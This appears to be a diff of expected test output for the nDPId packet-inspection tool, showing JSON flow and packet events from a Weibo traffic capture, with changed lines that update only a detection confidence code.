00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1463089070757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1463089070757,"pkt":"kDVu60UQeJKcD6iOCABFAAA3JrZAAEARkEXAqAFpwKgBAdbMADUAI69dsmwBAAABAAAAAAAABXdlaWJvA2NvbQAAAQAB"} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1463089070841,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1463089070841,"pkt":"eJKcD6iOkDVu60UQCABFAABHAABAAEARtuvAqAEBwKgBaQA11swAM884smyBgAABAAEAAAAABXdlaWJvA2NvbQAAAQABwAwAAQABAAAAJAAEcoZQog=="} -00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"114.134.80.162"}} +00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"114.134.80.162"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA8BZVAAEAGr+3AqAFpcoZQoubvAFC9RQISAAAAAKACchCiVgAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -30,21 +30,21 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463089071094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071094,"pkt":"eJKcD6iOkDVu60UQCABFAAA0QjAAADYG1XnYOtLOwKgBaQG7iVJFmCd++rIVGIAQCVwVnQAAAQEICm9c76IAQIN7"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1463089071195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071195,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BcYAACkGBsVyhlCiwKgBaQBQ5u8JOZF4vUUCE4ASOQhvgQAAAgQFqAEBBAIBAwMH"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1463089071195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071195,"pkt":"kDVu60UQeJKcD6iOCABFAAAoBZZAAEAGsADAqAFpcoZQoubvAFC9RQITCTmReVAQAOXoagAA"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1463089071198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071198,"pkt":"eJKcD6iOkDVu60UQCABFAAA0IcQAACoG6cZyhlCiwKgBaQBQ5vAZ6VqE6wTXzYASOQiSSgAAAgQFqAEBBAIBAwMH"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1463089071198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071198,"pkt":"kDVu60UQeJKcD6iOCABFAAAo0ExAAEAG5UnAqAFpcoZQoubwAFDrBNfNGelahVAQAOULNAAA"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463089071348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071348,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BccAACoGBcRyhlCiwKgBaQBQ5vFPiVnutrx1cIASOQjz5AAAAgQFqAEBBAIBAwMH"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463089071348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071348,"pkt":"kDVu60UQeJKcD6iOCABFAAAoct9AAEAGQrfAqAFpcoZQoubxAFC2vHVwT4lZ71AQAOVszgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1463089071551,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1463089071551,"pkt":"kDVu60UQeJKcD6iOCABFAAA7Jz9AAEARj7jAqAFpwKgBARvsADUAJ8YJ26oBAAABAAAAAAAAA3d3dwV3ZWlibwNjb20AAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1463089071612,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1463089071612,"pkt":"eJKcD6iOkDVu60UQCABFAACAAABAAEARtrLAqAEBwKgBaQA1G+wAbIVL26qBgAABAAMAAAAAA3d3dwV3ZWlibwNjb20AAAEAAcAMAAUAAQAAACUAGQN3d3cFd2VpYm8DY29tBWNkbmdjA25ldADAKwABAAEAAAAHAARdvIaJwCsAAQABAAAABwAEXbyGhw=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089071612,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.137"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089071612,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.137"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071613,"flow_last_seen":1463089071613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071613,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1463089071613,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071613,"pkt":"kDVu60UQeJKcD6iOCABFAAA84VFAAEAGsxPAqAFpXbyGicnyAFB0WekZAAAAAKACchD\/WQAAAgQFtAQCCAoAQQhIAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1463089071642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071642,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGnGVdvIaJwKgBaQBQyfKlqmMtdFnpGqAS\/\/8RHAAAAgQFqAQCCAr5u121AEEISAEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1463089071642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071642,"pkt":"kDVu60UQeJKcD6iOCABFAAA04VJAAEAGsxrAqAFpXbyGicnyAFB0WekapapjLoAQAOU+7wAAAQEICgBBCFD5u121"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071730,"flow_last_seen":1463089071730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071730,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1463089071730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071730,"pkt":"kDVu60UQeJKcD6iOCABFAAA08m9AAEAG2cLAqAFp2DrURZOqAbsjKGR2xs8noYAQA+RthAAAAQEICgBBCGYlk10U"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1463089071755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071755,"pkt":"eJKcD6iOkDVu60UQCABFAAA0StsAADYGy1fYOtRFwKgBaQG7k6rGzyehIyhkd4AQAsDqzAAAAQEICiWUDPAAQNxk"} @@ -53,14 +53,13 @@ 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072046,"flow_last_seen":1463089072046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089072046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1463089072046,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dEpAAEAGV+zAqAFp2DrUQYeLAbv4qaw1BowayYAQAO03NAAAAQEICgBBCLUlGFKF"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1463089072070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072070,"pkt":"eJKcD6iOkDVu60UQCABFAAA0NhEAADYG4CXYOtRBwKgBaQG7h4sGjBrJ+KmsNoAQAV6y1gAAAQEICiUZAmMAQNzC"} -00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1463089072138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072138,"pkt":"eJKcD6iOkDVu60UQCABFAAA0XohAABsGZHc24aPSwKgBaQG7nfhaPbwDA69SioAQAIjCywAAAQEICgEjLGEAQNyy"} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1463089071613,"flow_last_seen":1463089072285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":12516,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1463089072285,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 